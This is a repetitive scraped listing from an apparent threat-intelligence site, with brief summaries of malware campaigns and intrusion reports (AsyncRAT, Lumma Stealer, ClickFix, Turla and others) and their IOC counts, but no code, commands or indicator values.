Threat actors are using fake Google Meet web pages as part of the ClickFix campaign to deliver infostealers targeting Windows and macOS systems. The attackers display fake error messages in web browsers, tricking users into executing malicious PowerShell code. The campaign has expanded to impersona…
Downloadable IOCs 0
Burning Zero Days: Suspected Nation-State Adversary Targets Ivanti CSA
A zero-day vulnerability exploited by an advanced adversary to gain access to a victim’s network, according to research by FortiGuard Labs and the Centre for Strategic Intelligence (CISA).
Downloadable IOCs 17
HijackLoader evolution: abusing genuine signing certificates
A report by HarfangLab EDR and MITRE ATT&CK on the threat posed by the Lumma Stealer malware, published on 11 October, 2024, outlines the tactics used to deploy the malware.
Downloadable IOCs 69
Malware by the (Bit)Bucket: Uncovering AsyncRAT
A sophisticated attack campaign using Bitbucket as a legitimate platform to deliver AsyncRAT has been uncovered. The multi-stage approach involves a VBScript obfuscation layer, followed by a PowerShell payload delivery mechanism, and culminates in the execution of AsyncRAT. The attackers exploit Bi…
Downloadable IOCs 0
Not All Fun and Games: Lua Malware Targets Educational Sector and Student Gaming Engines
Over the past year, the delivery of Lua malware appears to have undergone simplification, possibly to reduce exposure to detection mechanisms. The malware is frequently delivered using obfuscated Lua scripts instead of compiled Lua bytecode, as the latter can trigger suspicion more easily.
Downloadable IOCs 18
Tweaking AsyncRAT: Using Python and TryCloudflare to Deploy Malware
A new AsyncRAT malware campaign utilizes TryCloudflare quick tunnels and Python packages to deliver malicious payloads. The attack chain involves HTML attachments with 'search-ms' URI protocol handlers, leading to LNK files that download BAT files. These BAT files then retrieve and execute Python s…
Downloadable IOCs 15
PowerShell Keylogger
A newly identified keylogger operating via PowerShell script has been analyzed, revealing its capabilities to capture keystrokes, gather system information, and exfiltrate data. The malware uses a cloud server in Finland as a proxy and an Onion server for C2 communication, ensuring anonymity. It im…
Downloadable IOCs 3
Exploring AsyncRAT and Infostealer Plugin Delivery Through…
This analysis details an AsyncRAT infection observed in August 2024, delivered via email. The attack chain involves a Windows Script File that downloads and executes various scripts, ultimately leading to the installation of AsyncRAT with an infostealer plugin. The malware targets multiple browsers…
Downloadable IOCs 8
Analyzing the Mekotio Trojan
The analysis delves into the Mekotio Trojan, a sophisticated malware that employs a PowerShell dropper to execute its payload. The dropper employs obfuscation techniques, such as custom XOR decryption, to conceal its operations. It collects system information, communicates with a command-and-contro…
Downloadable IOCs 2
Decoding the Stealthy Memory-Only Malware
This intelligence report provides an in-depth analysis of a complex, multi-stage malware campaign called PEAKLIGHT. It details the infection chain, starting with movie lure ZIP files containing malicious LNK files that initiate a JavaScript dropper. This dropper then executes a PowerShell downloade…
Downloadable IOCs 23
Report on Ukraine government attack campaign
Ukraine's government cybersecurity incident response team, CERT-UA, obtained information about the distribution of emails themed around prisoners of war, containing links to download an archive named 'spysok_kursk.zip'. This archive contained a CHM file with JavaScript code that launched an obfusca…
Downloadable IOCs 33
Multiple Malware Dropped Through MSI Package
An analysis reveals the distribution of malware through an MSI package, specifically SectopRat and Redline stealer. The malware employs techniques like executing malicious scripts, disabling security measures, and establishing persistence through scheduled tasks. It communicates with command-and-co…
Downloadable IOCs 11
Unmasking Cronus: How Fake PayPal Documents Execute Fileless Ransomware via PowerShell
The analysis reveals a sophisticated campaign employing fake PayPal receipts as lures to distribute a new variant of the Cronus ransomware. The infection chain begins with a malicious Word document containing an obfuscated VBA macro that downloads a PowerShell loader from a remote server. This load…
Downloadable IOCs 8
Detecting evolving threats: NetSupport RAT campaign
This analysis examines a recent malware campaign that utilizes the NetSupport RAT, a legitimate remote administration tool, for persistent infections. The threat actors behind this campaign employ obfuscation techniques and updates to evade detection. However, by identifying weaknesses in the obfus…
Downloadable IOCs 3
Distribution of AsyncRAT Disguised as Ebook
This analysis covers the distribution of AsyncRAT malware disguised as an ebook. The compressed file contains a malicious LNK and PowerShell scripts that ultimately execute AsyncRAT. The malware employs various techniques, such as obfuscation, task scheduling, and anti-VM and anti-AV capabilities, …
Downloadable IOCs 5
Kimsuky Group’s New Backdoor (HappyDoor)
This report provides a detailed analysis of the HappyDoor malware, a new backdoor utilized by the Kimsuky threat group known for targeting organizations with spear-phishing attacks. The malware employs sophisticated techniques like self-duplication, hidden execution paths, and encrypted communicati…
Downloadable IOCs 7
Turla: A Master of Deception
This report details a recent campaign by the Turla threat group involving malicious LNK files that deliver a fileless backdoor. The attack leverages compromised websites, PowerShell scripts, and MSBuild to deploy the payload, which employs various evasion techniques like disabling security features…
Downloadable IOCs 10
ProxyLogon and ProxyShell Used to Target Government Mail Servers in Asia, Europe, and South America
This analysis describes the identification of a server likely exploiting ProxyLogon and ProxyShell vulnerabilities to gain unauthorized access to government email servers across Asia, Europe, and South America. The threat actor leveraged open-source exploit code to infiltrate systems and steal sens…
Downloadable IOCs 4
Malvertising Campaign Leads to Execution of Oyster Backdoor
Rapid7 has observed a recent malvertising campaign that lures users into downloading malicious installers for popular software such as Google Chrome and Microsoft Teams.
Downloadable IOCs 13
AdsExhaust, a Newly Discovered Adware MasqueradingOculus…
In June 2024, the eSentire Threat Response Unit (TRU) identified adware, which we have dubbed AdsExhaust, being distributed through a fake Oculus installer application. The adware is capable of exfiltrating screenshots from infected devices and interacting with browsers using simulated keystrokes.
Downloadable IOCs 17
FHAPPI Campaign APT10 FreeHosting APT PowerSploit Poison Ivy
This analysis details a malicious campaign dubbed 'FHAPPI' by the researcher, which utilized compromised Geocities Japan accounts to host malware payloads. The campaign leveraged VBScript and PowerShell scripts to execute encoded commands, ultimately delivering the Poison Ivy remote access trojan (…
Downloadable IOCs 5
From Clipboard to Compromise: A PowerShell Self-Pwn
This intelligence report details a unique social engineering technique observed by Proofpoint researchers, leveraging users to copy and paste malicious PowerShell scripts to infect their computers. The threat actors TA571 and ClearFake activity cluster employ this method to deliver malware like Dar…
Downloadable IOCs 14
APT Attacks Using Cloud Storage
The report describes a malicious campaign where threat actors utilize cloud services like Google Drive, OneDrive, and Dropbox to distribute malware and collect user information. The attack process starts with a malicious shortcut file (LNK) that executes PowerShell scripts to download decoy documen…
Downloadable IOCs 1
Warning Against Phishing Emails Prompting Execution of Commands via Paste
This report details a phishing campaign distributing malicious HTML files through emails. The files prompt users to paste and run malicious PowerShell commands that initiate a multi-stage infection process. The campaign ultimately delivers the DarkGate malware, highlighting the importance of exerci…
Downloadable IOCs 15
Decoding Water Sigbin's Latest Obfuscation Tricks
The China-based threat group Water Sigbin, known for deploying cryptocurrency-mining malware, exhibited new techniques to evade detection. It exploited CVE-2017-3506 and CVE-2023-21839 to deploy a PowerShell script executing a miner. The script utilized complex encoding, environment variables to hi…
Downloadable IOCs 9
Gootloader walkthrough
The analysis delves into the intricate workings of the Gootloader malware campaign. Through a meticulously crafted social engineering scheme involving SEO poisoning and fake forums, threat actors lure unsuspecting victims into downloading a malicious JavaScript file disguised as a legitimate resour…
Downloadable IOCs 12
Spring Exacerbation: UAC-0006 increased cyberattacks
This report aims to provide insights into the ongoing cyber operations targeting Ukraine. It analyzes the tactics, techniques, and procedures employed by threat actors in their malicious campaigns. The document offers a comprehensive overview of the cybersecurity landscape in Ukraine, highlighting …
Downloadable IOCs 31
Analysis and Detection of CLOUD#REVERSER: An Attack Involving Threat Actors Compromising Systems Using A Sophisticated Cloud-Based Malware
Securonix Threat Research has uncovered a sophisticated malware campaign, dubbed CLOUD#REVERSER, that leverages popular cloud storage services like Google Drive and Dropbox for malware delivery, command execution, and data exfiltration. The infection chain starts with a phishing email containing a …
Downloadable IOCs 16
Exploring the Metamorfo Banking Trojan
This report delves into a malware campaign known as Metamorfo, a banking Trojan that spreads through malspam campaigns. It entices users to click on HTML attachments, initiating a series of activities focused on gathering system metadata. The infection chain involves obfuscation techniques, URL eva…
Downloadable IOCs 39
Mallox ranomware affiliate leverages PureCrypter in MS-SQL exploitation campaigns
A team from security firm Sekoia has observed a series of attacks targeting vulnerable assets, including MS-SQL, and Mallox ransomware, using techniques similar to that of the PureCrypter ransomware.
Downloadable IOCs 10
Phishing Campaigns Targeting USPS See as Much Web Traffic as the USPS Itself
Following the 2023 holiday season, Akamai researchers uncovered a significant amount of highly likely malicious activity and domains purporting to be associated with the United States Postal Service (USPS). Akamai researchers compared five months of DNS traffic to the legitimate domain, usps.com, w…
Downloadable IOCs 34
From IcedID to Dagon Locker Ransomware in 29 Days
This intrusion started in August 2023 with a phishing campaign that distributed IcedID malware. The phishing operation utilized the Prometheus Traffic Direction System (TDS) to deliver the malware and victims were directed to a fraudulent website, mimicking an Azure download portal.
Downloadable IOCs 33
Unmasking Lumma Stealer: Analyzing Deceptive Tactics with Fake CAPTCHA
Lumma Stealer, a sophisticated information-stealing malware, has evolved its tactics to employ fake CAPTCHA verification for payload delivery. The malware exploits legitimate software and uses multi-stage fileless techniques to evade detection. Its infection chain involves PowerShell scripts, proce…
Downloadable IOCs 23
Beware: Fake Google Meet Pages Deliver Infostealers in Ongoing ClickFix Campaign
Threat actors are using fake Google Meet web pages as part of the ClickFix campaign to deliver infostealers targeting Windows and macOS systems. The attackers display fake error messages in web browsers, tricking users into executing malicious PowerShell code. The campaign has expanded to impersona…
Downloadable IOCs 0
Burning Zero Days: Suspected Nation-State Adversary Targets Ivanti CSA
A zero-day vulnerability exploited by an advanced adversary to gain access to a victim’s network, according to research by FortiGuard Labs and the Centre for Strategic Intelligence (CISA).
Downloadable IOCs 17
HijackLoader evolution: abusing genuine signing certificates
A report by HarfangLab EDR and MITRE ATT&CK on the threat posed by the Lumma Stealer malware, published on 11 October, 2024, outlines the tactics used to deploy the malware.
Downloadable IOCs 69
Malware by the (Bit)Bucket: Uncovering AsyncRAT
A sophisticated attack campaign using Bitbucket as a legitimate platform to deliver AsyncRAT has been uncovered. The multi-stage approach involves a VBScript obfuscation layer, followed by a PowerShell payload delivery mechanism, and culminates in the execution of AsyncRAT. The attackers exploit Bi…
Downloadable IOCs 0
Not All Fun and Games: Lua Malware Targets Educational Sector and Student Gaming Engines
Over the past year, the delivery of Lua malware appears to have undergone simplification, possibly to reduce exposure to detection mechanisms. The malware is frequently delivered using obfuscated Lua scripts instead of compiled Lua bytecode, as the latter can trigger suspicion more easily.
Downloadable IOCs 18
Tweaking AsyncRAT: Using Python and TryCloudflare to Deploy Malware
A new AsyncRAT malware campaign utilizes TryCloudflare quick tunnels and Python packages to deliver malicious payloads. The attack chain involves HTML attachments with 'search-ms' URI protocol handlers, leading to LNK files that download BAT files. These BAT files then retrieve and execute Python s…
Downloadable IOCs 15
PowerShell Keylogger
A newly identified keylogger operating via PowerShell script has been analyzed, revealing its capabilities to capture keystrokes, gather system information, and exfiltrate data. The malware uses a cloud server in Finland as a proxy and an Onion server for C2 communication, ensuring anonymity. It im…
Downloadable IOCs 3
Exploring AsyncRAT and Infostealer Plugin Delivery Through…
This analysis details an AsyncRAT infection observed in August 2024, delivered via email. The attack chain involves a Windows Script File that downloads and executes various scripts, ultimately leading to the installation of AsyncRAT with an infostealer plugin. The malware targets multiple browsers…
Downloadable IOCs 8
Analyzing the Mekotio Trojan
The analysis delves into the Mekotio Trojan, a sophisticated malware that employs a PowerShell dropper to execute its payload. The dropper employs obfuscation techniques, such as custom XOR decryption, to conceal its operations. It collects system information, communicates with a command-and-contro…
Downloadable IOCs 2
Decoding the Stealthy Memory-Only Malware
This intelligence report provides an in-depth analysis of a complex, multi-stage malware campaign called PEAKLIGHT. It details the infection chain, starting with movie lure ZIP files containing malicious LNK files that initiate a JavaScript dropper. This dropper then executes a PowerShell downloade…
Downloadable IOCs 23
Report on Ukraine government attack campaign
Ukraine's government cybersecurity incident response team, CERT-UA, obtained information about the distribution of emails themed around prisoners of war, containing links to download an archive named 'spysok_kursk.zip'. This archive contained a CHM file with JavaScript code that launched an obfusca…
Downloadable IOCs 33
Multiple Malware Dropped Through MSI Package
An analysis reveals the distribution of malware through an MSI package, specifically SectopRat and Redline stealer. The malware employs techniques like executing malicious scripts, disabling security measures, and establishing persistence through scheduled tasks. It communicates with command-and-co…
Downloadable IOCs 11
Unmasking Cronus: How Fake PayPal Documents Execute Fileless Ransomware via PowerShell
The analysis reveals a sophisticated campaign employing fake PayPal receipts as lures to distribute a new variant of the Cronus ransomware. The infection chain begins with a malicious Word document containing an obfuscated VBA macro that downloads a PowerShell loader from a remote server. This load…
Downloadable IOCs 8
Detecting evolving threats: NetSupport RAT campaign
This analysis examines a recent malware campaign that utilizes the NetSupport RAT, a legitimate remote administration tool, for persistent infections. The threat actors behind this campaign employ obfuscation techniques and updates to evade detection. However, by identifying weaknesses in the obfus…
Downloadable IOCs 3
Distribution of AsyncRAT Disguised as Ebook
This analysis covers the distribution of AsyncRAT malware disguised as an ebook. The compressed file contains a malicious LNK and PowerShell scripts that ultimately execute AsyncRAT. The malware employs various techniques, such as obfuscation, task scheduling, and anti-VM and anti-AV capabilities, …
Downloadable IOCs 5
Kimsuky Group’s New Backdoor (HappyDoor)
This report provides a detailed analysis of the HappyDoor malware, a new backdoor utilized by the Kimsuky threat group known for targeting organizations with spear-phishing attacks. The malware employs sophisticated techniques like self-duplication, hidden execution paths, and encrypted communicati…
Downloadable IOCs 7
Turla: A Master of Deception
This report details a recent campaign by the Turla threat group involving malicious LNK files that deliver a fileless backdoor. The attack leverages compromised websites, PowerShell scripts, and MSBuild to deploy the payload, which employs various evasion techniques like disabling security features…
Downloadable IOCs 10
ProxyLogon and ProxyShell Used to Target Government Mail Servers in Asia, Europe, and South America
This analysis describes the identification of a server likely exploiting ProxyLogon and ProxyShell vulnerabilities to gain unauthorized access to government email servers across Asia, Europe, and South America. The threat actor leveraged open-source exploit code to infiltrate systems and steal sens…
Downloadable IOCs 4
Malvertising Campaign Leads to Execution of Oyster Backdoor
Rapid7 has observed a recent malvertising campaign that lures users into downloading malicious installers for popular software such as Google Chrome and Microsoft Teams.
Downloadable IOCs 13
AdsExhaust, a Newly Discovered Adware MasqueradingOculus…
In June 2024, the eSentire Threat Response Unit (TRU) identified adware, which we have dubbed AdsExhaust, being distributed through a fake Oculus installer application. The adware is capable of exfiltrating screenshots from infected devices and interacting with browsers using simulated keystrokes.
Downloadable IOCs 17
FHAPPI Campaign APT10 FreeHosting APT PowerSploit Poison Ivy
This analysis details a malicious campaign dubbed 'FHAPPI' by the researcher, which utilized compromised Geocities Japan accounts to host malware payloads. The campaign leveraged VBScript and PowerShell scripts to execute encoded commands, ultimately delivering the Poison Ivy remote access trojan (…
Downloadable IOCs 5
From Clipboard to Compromise: A PowerShell Self-Pwn
This intelligence report details a unique social engineering technique observed by Proofpoint researchers, leveraging users to copy and paste malicious PowerShell scripts to infect their computers. The threat actors TA571 and ClearFake activity cluster employ this method to deliver malware like Dar…
Downloadable IOCs 14
APT Attacks Using Cloud Storage
The report describes a malicious campaign where threat actors utilize cloud services like Google Drive, OneDrive, and Dropbox to distribute malware and collect user information. The attack process starts with a malicious shortcut file (LNK) that executes PowerShell scripts to download decoy documen…
Downloadable IOCs 1
Warning Against Phishing Emails Prompting Execution of Commands via Paste
This report details a phishing campaign distributing malicious HTML files through emails. The files prompt users to paste and run malicious PowerShell commands that initiate a multi-stage infection process. The campaign ultimately delivers the DarkGate malware, highlighting the importance of exerci…
Downloadable IOCs 15
Decoding Water Sigbin's Latest Obfuscation Tricks
The China-based threat group Water Sigbin, known for deploying cryptocurrency-mining malware, exhibited new techniques to evade detection. It exploited CVE-2017-3506 and CVE-2023-21839 to deploy a PowerShell script executing a miner. The script utilized complex encoding, environment variables to hi…
Downloadable IOCs 9
Gootloader walkthrough
The analysis delves into the intricate workings of the Gootloader malware campaign. Through a meticulously crafted social engineering scheme involving SEO poisoning and fake forums, threat actors lure unsuspecting victims into downloading a malicious JavaScript file disguised as a legitimate resour…
Downloadable IOCs 12
Spring Exacerbation: UAC-0006 increased cyberattacks
This report aims to provide insights into the ongoing cyber operations targeting Ukraine. It analyzes the tactics, techniques, and procedures employed by threat actors in their malicious campaigns. The document offers a comprehensive overview of the cybersecurity landscape in Ukraine, highlighting …
Downloadable IOCs 31
Analysis and Detection of CLOUD#REVERSER: An Attack Involving Threat Actors Compromising Systems Using A Sophisticated Cloud-Based Malware
Securonix Threat Research has uncovered a sophisticated malware campaign, dubbed CLOUD#REVERSER, that leverages popular cloud storage services like Google Drive and Dropbox for malware delivery, command execution, and data exfiltration. The infection chain starts with a phishing email containing a …
Downloadable IOCs 16
Exploring the Metamorfo Banking Trojan
This report delves into a malware campaign known as Metamorfo, a banking Trojan that spreads through malspam campaigns. It entices users to click on HTML attachments, initiating a series of activities focused on gathering system metadata. The infection chain involves obfuscation techniques, URL eva…
Downloadable IOCs 39
Mallox ranomware affiliate leverages PureCrypter in MS-SQL exploitation campaigns
A team from security firm Sekoia has observed a series of attacks targeting vulnerable assets, including MS-SQL, and Mallox ransomware, using techniques similar to that of the PureCrypter ransomware.
Downloadable IOCs 10
Phishing Campaigns Targeting USPS See as Much Web Traffic as the USPS Itself
Following the 2023 holiday season, Akamai researchers uncovered a significant amount of highly likely malicious activity and domains purporting to be associated with the United States Postal Service (USPS). Akamai researchers compared five months of DNS traffic to the legitimate domain, usps.com, w…
Downloadable IOCs 34
From IcedID to Dagon Locker Ransomware in 29 Days
This intrusion started in August 2023 with a phishing campaign that distributed IcedID malware. The phishing operation utilized the Prometheus Traffic Direction System (TDS) to deliver the malware and victims were directed to a fraudulent website, mimicking an Azure download portal.
Downloadable IOCs 33
Unmasking Lumma Stealer: Analyzing Deceptive Tactics with Fake CAPTCHA
Lumma Stealer, a sophisticated information-stealing malware, has evolved its tactics to employ fake CAPTCHA verification for payload delivery. The malware exploits legitimate software and uses multi-stage fileless techniques to evade detection. Its infection chain involves PowerShell scripts, proce…
Downloadable IOCs 23
Beware: Fake Google Meet Pages Deliver Infostealers in Ongoing ClickFix Campaign
Threat actors are using fake Google Meet web pages as part of the ClickFix campaign to deliver infostealers targeting Windows and macOS systems. The attackers display fake error messages in web browsers, tricking users into executing malicious PowerShell code. The campaign has expanded to impersona…
Downloadable IOCs 0
Burning Zero Days: Suspected Nation-State Adversary Targets Ivanti CSA
A zero-day vulnerability exploited by an advanced adversary to gain access to a victim’s network, according to research by FortiGuard Labs and the Centre for Strategic Intelligence (CISA).
Downloadable IOCs 17
HijackLoader evolution: abusing genuine signing certificates
A report by HarfangLab EDR and MITRE ATT&CK on the threat posed by the Lumma Stealer malware, published on 11 October, 2024, outlines the tactics used to deploy the malware.
Downloadable IOCs 69
Malware by the (Bit)Bucket: Uncovering AsyncRAT
A sophisticated attack campaign using Bitbucket as a legitimate platform to deliver AsyncRAT has been uncovered. The multi-stage approach involves a VBScript obfuscation layer, followed by a PowerShell payload delivery mechanism, and culminates in the execution of AsyncRAT. The attackers exploit Bi…
Downloadable IOCs 0
Not All Fun and Games: Lua Malware Targets Educational Sector and Student Gaming Engines
Over the past year, the delivery of Lua malware appears to have undergone simplification, possibly to reduce exposure to detection mechanisms. The malware is frequently delivered using obfuscated Lua scripts instead of compiled Lua bytecode, as the latter can trigger suspicion more easily.
Downloadable IOCs 18
Tweaking AsyncRAT: Using Python and TryCloudflare to Deploy Malware
A new AsyncRAT malware campaign utilizes TryCloudflare quick tunnels and Python packages to deliver malicious payloads. The attack chain involves HTML attachments with 'search-ms' URI protocol handlers, leading to LNK files that download BAT files. These BAT files then retrieve and execute Python s…
Downloadable IOCs 15
PowerShell Keylogger
A newly identified keylogger operating via PowerShell script has been analyzed, revealing its capabilities to capture keystrokes, gather system information, and exfiltrate data. The malware uses a cloud server in Finland as a proxy and an Onion server for C2 communication, ensuring anonymity. It im…
Downloadable IOCs 3
Exploring AsyncRAT and Infostealer Plugin Delivery Through…
This analysis details an AsyncRAT infection observed in August 2024, delivered via email. The attack chain involves a Windows Script File that downloads and executes various scripts, ultimately leading to the installation of AsyncRAT with an infostealer plugin. The malware targets multiple browsers…
Downloadable IOCs 8
Analyzing the Mekotio Trojan
The analysis delves into the Mekotio Trojan, a sophisticated malware that employs a PowerShell dropper to execute its payload. The dropper employs obfuscation techniques, such as custom XOR decryption, to conceal its operations. It collects system information, communicates with a command-and-contro…
Downloadable IOCs 2
Decoding the Stealthy Memory-Only Malware
This intelligence report provides an in-depth analysis of a complex, multi-stage malware campaign called PEAKLIGHT. It details the infection chain, starting with movie lure ZIP files containing malicious LNK files that initiate a JavaScript dropper. This dropper then executes a PowerShell downloade…
Downloadable IOCs 23
Report on Ukraine government attack campaign
Ukraine's government cybersecurity incident response team, CERT-UA, obtained information about the distribution of emails themed around prisoners of war, containing links to download an archive named 'spysok_kursk.zip'. This archive contained a CHM file with JavaScript code that launched an obfusca…
Downloadable IOCs 33
Multiple Malware Dropped Through MSI Package
An analysis reveals the distribution of malware through an MSI package, specifically SectopRat and Redline stealer. The malware employs techniques like executing malicious scripts, disabling security measures, and establishing persistence through scheduled tasks. It communicates with command-and-co…
Downloadable IOCs 11
Unmasking Cronus: How Fake PayPal Documents Execute Fileless Ransomware via PowerShell
The analysis reveals a sophisticated campaign employing fake PayPal receipts as lures to distribute a new variant of the Cronus ransomware. The infection chain begins with a malicious Word document containing an obfuscated VBA macro that downloads a PowerShell loader from a remote server. This load…
Downloadable IOCs 8
Detecting evolving threats: NetSupport RAT campaign
This analysis examines a recent malware campaign that utilizes the NetSupport RAT, a legitimate remote administration tool, for persistent infections. The threat actors behind this campaign employ obfuscation techniques and updates to evade detection. However, by identifying weaknesses in the obfus…
Downloadable IOCs 3
Distribution of AsyncRAT Disguised as Ebook
This analysis covers the distribution of AsyncRAT malware disguised as an ebook. The compressed file contains a malicious LNK and PowerShell scripts that ultimately execute AsyncRAT. The malware employs various techniques, such as obfuscation, task scheduling, and anti-VM and anti-AV capabilities, …
Downloadable IOCs 5
Kimsuky Group’s New Backdoor (HappyDoor)
This report provides a detailed analysis of the HappyDoor malware, a new backdoor utilized by the Kimsuky threat group known for targeting organizations with spear-phishing attacks. The malware employs sophisticated techniques like self-duplication, hidden execution paths, and encrypted communicati…
Downloadable IOCs 7
Turla: A Master of Deception
This report details a recent campaign by the Turla threat group involving malicious LNK files that deliver a fileless backdoor. The attack leverages compromised websites, PowerShell scripts, and MSBuild to deploy the payload, which employs various evasion techniques like disabling security features…
Downloadable IOCs 10
ProxyLogon and ProxyShell Used to Target Government Mail Servers in Asia, Europe, and South America
This analysis describes the identification of a server likely exploiting ProxyLogon and ProxyShell vulnerabilities to gain unauthorized access to government email servers across Asia, Europe, and South America. The threat actor leveraged open-source exploit code to infiltrate systems and steal sens…
Downloadable IOCs 4
Malvertising Campaign Leads to Execution of Oyster Backdoor
Rapid7 has observed a recent malvertising campaign that lures users into downloading malicious installers for popular software such as Google Chrome and Microsoft Teams.
Downloadable IOCs 13
AdsExhaust, a Newly Discovered Adware MasqueradingOculus…
In June 2024, the eSentire Threat Response Unit (TRU) identified adware, which we have dubbed AdsExhaust, being distributed through a fake Oculus installer application. The adware is capable of exfiltrating screenshots from infected devices and interacting with browsers using simulated keystrokes.
Downloadable IOCs 17
FHAPPI Campaign APT10 FreeHosting APT PowerSploit Poison Ivy
This analysis details a malicious campaign dubbed 'FHAPPI' by the researcher, which utilized compromised Geocities Japan accounts to host malware payloads. The campaign leveraged VBScript and PowerShell scripts to execute encoded commands, ultimately delivering the Poison Ivy remote access trojan (…
Downloadable IOCs 5
From Clipboard to Compromise: A PowerShell Self-Pwn
This intelligence report details a unique social engineering technique observed by Proofpoint researchers, leveraging users to copy and paste malicious PowerShell scripts to infect their computers. The threat actors TA571 and ClearFake activity cluster employ this method to deliver malware like Dar…
Downloadable IOCs 14
APT Attacks Using Cloud Storage
The report describes a malicious campaign where threat actors utilize cloud services like Google Drive, OneDrive, and Dropbox to distribute malware and collect user information. The attack process starts with a malicious shortcut file (LNK) that executes PowerShell scripts to download decoy documen…
Downloadable IOCs 1
Warning Against Phishing Emails Prompting Execution of Commands via Paste
This report details a phishing campaign distributing malicious HTML files through emails. The files prompt users to paste and run malicious PowerShell commands that initiate a multi-stage infection process. The campaign ultimately delivers the DarkGate malware, highlighting the importance of exerci…
Downloadable IOCs 15
Decoding Water Sigbin's Latest Obfuscation Tricks
The China-based threat group Water Sigbin, known for deploying cryptocurrency-mining malware, exhibited new techniques to evade detection. It exploited CVE-2017-3506 and CVE-2023-21839 to deploy a PowerShell script executing a miner. The script utilized complex encoding, environment variables to hi…
Downloadable IOCs 9
Gootloader walkthrough
The analysis delves into the intricate workings of the Gootloader malware campaign. Through a meticulously crafted social engineering scheme involving SEO poisoning and fake forums, threat actors lure unsuspecting victims into downloading a malicious JavaScript file disguised as a legitimate resour…
Downloadable IOCs 12
Spring Exacerbation: UAC-0006 increased cyberattacks
This report aims to provide insights into the ongoing cyber operations targeting Ukraine. It analyzes the tactics, techniques, and procedures employed by threat actors in their malicious campaigns. The document offers a comprehensive overview of the cybersecurity landscape in Ukraine, highlighting …
Downloadable IOCs 31
Analysis and Detection of CLOUD#REVERSER: An Attack Involving Threat Actors Compromising Systems Using A Sophisticated Cloud-Based Malware
Securonix Threat Research has uncovered a sophisticated malware campaign, dubbed CLOUD#REVERSER, that leverages popular cloud storage services like Google Drive and Dropbox for malware delivery, command execution, and data exfiltration. The infection chain starts with a phishing email containing a …
Downloadable IOCs 16
Exploring the Metamorfo Banking Trojan
This report delves into a malware campaign known as Metamorfo, a banking Trojan that spreads through malspam campaigns. It entices users to click on HTML attachments, initiating a series of activities focused on gathering system metadata. The infection chain involves obfuscation techniques, URL eva…
Downloadable IOCs 39
Mallox ranomware affiliate leverages PureCrypter in MS-SQL exploitation campaigns
A team from security firm Sekoia has observed a series of attacks targeting vulnerable assets, including MS-SQL, and Mallox ransomware, using techniques similar to that of the PureCrypter ransomware.
Downloadable IOCs 10
Phishing Campaigns Targeting USPS See as Much Web Traffic as the USPS Itself
Following the 2023 holiday season, Akamai researchers uncovered a significant amount of highly likely malicious activity and domains purporting to be associated with the United States Postal Service (USPS). Akamai researchers compared five months of DNS traffic to the legitimate domain, usps.com, w…
Downloadable IOCs 34
From IcedID to Dagon Locker Ransomware in 29 Days
This intrusion started in August 2023 with a phishing campaign that distributed IcedID malware. The phishing operation utilized the Prometheus Traffic Direction System (TDS) to deliver the malware and victims were directed to a fraudulent website, mimicking an Azure download portal.
Downloadable IOCs 33
Unmasking Lumma Stealer: Analyzing Deceptive Tactics with Fake CAPTCHA
Lumma Stealer, a sophisticated information-stealing malware, has evolved its tactics to employ fake CAPTCHA verification for payload delivery. The malware exploits legitimate software and uses multi-stage fileless techniques to evade detection. Its infection chain involves PowerShell scripts, proce…
Downloadable IOCs 23
Beware: Fake Google Meet Pages Deliver Infostealers in Ongoing ClickFix Campaign
Threat actors are using fake Google Meet web pages as part of the ClickFix campaign to deliver infostealers targeting Windows and macOS systems. The attackers display fake error messages in web browsers, tricking users into executing malicious PowerShell code. The campaign has expanded to impersona…
Downloadable IOCs 0
Burning Zero Days: Suspected Nation-State Adversary Targets Ivanti CSA
A zero-day vulnerability exploited by an advanced adversary to gain access to a victim’s network, according to research by FortiGuard Labs and the Centre for Strategic Intelligence (CISA).
Downloadable IOCs 17
HijackLoader evolution: abusing genuine signing certificates
A report by HarfangLab EDR and MITRE ATT&CK on the threat posed by the Lumma Stealer malware, published on 11 October, 2024, outlines the tactics used to deploy the malware.
Downloadable IOCs 69
Malware by the (Bit)Bucket: Uncovering AsyncRAT
A sophisticated attack campaign using Bitbucket as a legitimate platform to deliver AsyncRAT has been uncovered. The multi-stage approach involves a VBScript obfuscation layer, followed by a PowerShell payload delivery mechanism, and culminates in the execution of AsyncRAT. The attackers exploit Bi…
Downloadable IOCs 0
Not All Fun and Games: Lua Malware Targets Educational Sector and Student Gaming Engines
Over the past year, the delivery of Lua malware appears to have undergone simplification, possibly to reduce exposure to detection mechanisms. The malware is frequently delivered using obfuscated Lua scripts instead of compiled Lua bytecode, as the latter can trigger suspicion more easily.
Downloadable IOCs 18
Tweaking AsyncRAT: Using Python and TryCloudflare to Deploy Malware
A new AsyncRAT malware campaign utilizes TryCloudflare quick tunnels and Python packages to deliver malicious payloads. The attack chain involves HTML attachments with 'search-ms' URI protocol handlers, leading to LNK files that download BAT files. These BAT files then retrieve and execute Python s…
Downloadable IOCs 15
PowerShell Keylogger
A newly identified keylogger operating via PowerShell script has been analyzed, revealing its capabilities to capture keystrokes, gather system information, and exfiltrate data. The malware uses a cloud server in Finland as a proxy and an Onion server for C2 communication, ensuring anonymity. It im…
Downloadable IOCs 3
Exploring AsyncRAT and Infostealer Plugin Delivery Through…
This analysis details an AsyncRAT infection observed in August 2024, delivered via email. The attack chain involves a Windows Script File that downloads and executes various scripts, ultimately leading to the installation of AsyncRAT with an infostealer plugin. The malware targets multiple browsers…
Downloadable IOCs 8
Analyzing the Mekotio Trojan
The analysis delves into the Mekotio Trojan, a sophisticated malware that employs a PowerShell dropper to execute its payload. The dropper employs obfuscation techniques, such as custom XOR decryption, to conceal its operations. It collects system information, communicates with a command-and-contro…
Downloadable IOCs 2
Decoding the Stealthy Memory-Only Malware
This intelligence report provides an in-depth analysis of a complex, multi-stage malware campaign called PEAKLIGHT. It details the infection chain, starting with movie lure ZIP files containing malicious LNK files that initiate a JavaScript dropper. This dropper then executes a PowerShell downloade…
Downloadable IOCs 23
Report on Ukraine government attack campaign
Ukraine's government cybersecurity incident response team, CERT-UA, obtained information about the distribution of emails themed around prisoners of war, containing links to download an archive named 'spysok_kursk.zip'. This archive contained a CHM file with JavaScript code that launched an obfusca…
Downloadable IOCs 33
Multiple Malware Dropped Through MSI Package
An analysis reveals the distribution of malware through an MSI package, specifically SectopRat and Redline stealer. The malware employs techniques like executing malicious scripts, disabling security measures, and establishing persistence through scheduled tasks. It communicates with command-and-co…
Downloadable IOCs 11
Unmasking Cronus: How Fake PayPal Documents Execute Fileless Ransomware via PowerShell
